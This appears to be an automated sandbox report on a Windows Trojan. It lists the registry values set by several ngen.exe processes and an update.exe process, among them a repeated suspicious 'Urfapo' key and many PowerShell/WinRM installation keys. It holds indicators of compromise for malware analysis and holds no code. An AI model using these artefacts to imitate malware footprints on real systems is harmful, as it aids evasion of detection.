The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E7 A4 9C 3E 6D 8F EF 95 1D E9 A2 29 29 14 CD 31"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:1944 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "14 36 3F 03 CA D9 49 27 40 EC 1E 2A 3E ED 88 44"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:420 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "21 06 AE E1 A2 9A 6F 17 80 7E CC A6 C6 71 8C 02"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
"Status" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:916 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BA BF 7F 74 13 7A 0E 30 EE C9 E7 3C 1F 4B 7E 7B"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:3936 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B7 60 25 1D 59 3F 5B A2 71 C0 34 E4 A8 40 77 57"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
"Status" = "3"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:3996 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "99 91 A1 4B 8E AF C1 5E F3 AF FA 92 92 7F EC 6A"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

The process ngen.exe:1868 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "86 00 E6 A9 17 31 9E D1 C0 2B A6 B3 D9 54 7C C9"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:2188 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3F 00 5B A4 3B 3B 6C 41 92 DB A0 1E EA 8D 9B 22"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:2952 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E2 22 E0 FD 15 DA 56 7A 9F CB 8A 7B 9B F4 FD 91"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:3560 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "97 75 E2 45 15 39 DA 4E 54 AA 43 CC 21 47 F4 18"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:3224 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B0 03 D2 02 EC DC 5E F3 2A B2 2C BA D5 8E 28 53"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:1724 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "22 A1 B5 D3 FB 93 58 64 35 9C 44 41 34 0D 19 41"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:3220 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F1 87 E0 CA 67 5F 96 A0 E1 59 68 FE 09 42 DB C7"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots]
"WorkPending" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:1976 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DE FE FD 38 57 45 58 6C 2F E3 28 00 11 68 56 4A"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:2164 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "66 57 E3 32 38 3D DB 9A 85 31 57 BA 83 6E 1D 1F"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process ngen.exe:648 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9C F5 C4 7C 9E A7 9B C2 5B A5 7B 45 F9 0E CC A1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process update.exe:4040 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"Description" = "Windows Management Framework Core"

[HKCR\CLSID\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\InprocServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN]
"StackVersion" = "2.0"

[HKCR\Microsoft.PowerShellModule.1\shell\Open\command]
"(Default)" = "%System%\notepad.exe %1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ]
"ControlFlags" = "1"

[HKCR\.psc1]
"(Default)" = "Microsoft.PowerShellConsole.1"

[HKCR\Interface\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}]
"(Default)" = "IWSManHostEntrySink"

[HKCR\CLSID\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\InprocServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsGetSignature"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\Typelib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\Typelib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"PSCompatibleVersion" = "1.0,2.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"NoModify" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\fc8:109f88\iis]
"PathWWWRoot" = "C:\Inetpub\wwwroot"

[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\AppID\{3feb2f63-0eec-4b96-84ab-da1307e0117c}]
"(Default)" = "Microsoft Windows WSMan Provider Host"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\KB968930]
"TypesSupported" = "7"

[HKCR\Microsoft.PowerShellModule.1]
"EditFlags" = "131072"

[HKCR\WSMan.InternalAutomation\CurVer]
"(Default)" = "WSMan.InternalAutomation.1"

[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}]
"(Default)" = "IWSManResourceLocator"

[HKCR\.ps1xml]
"PerceivedType" = "Text"

[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}]
"(Default)" = "IWSManConnectionOptions"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell\PowerShell]
"CategoryCount" = "8"

[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0\FLAGS]
"(Default)" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup]
"LogLevel" = "536870912"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKCR\Microsoft.PowerShellScript.1]
"EditFlags" = "131072"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost]
"WINRM" = "WINRM"

[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"file" = "%WinDir%\System32\config\WindowsPowerShell.evt"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKCR\Microsoft.PowerShellScript.1\shell\Run with PowerShell\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell.exe -file %1"

[HKCR\AppID\{3e5ca495-8d6a-4d1f-ad99-177b426c8b8e}]
"LaunchPermission" = "01 00 04 80 98 00 00 00 A4 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\WinRM]
"EventMessageFile" = "%systemroot%\system32\WsmRes.dll"

[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}\LocalServer32]
"ServerExecutable" = "%System%\wsmprovhost.exe"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKCR\CLSID\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\InprocServer32]
"(Default)" = "%System%\winrssrv.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\System\CurrentControlSet\Control\Session Manager\Environment]
"PSModulePath" = "%System%\WindowsPowerShell\v1.0\Modules\"

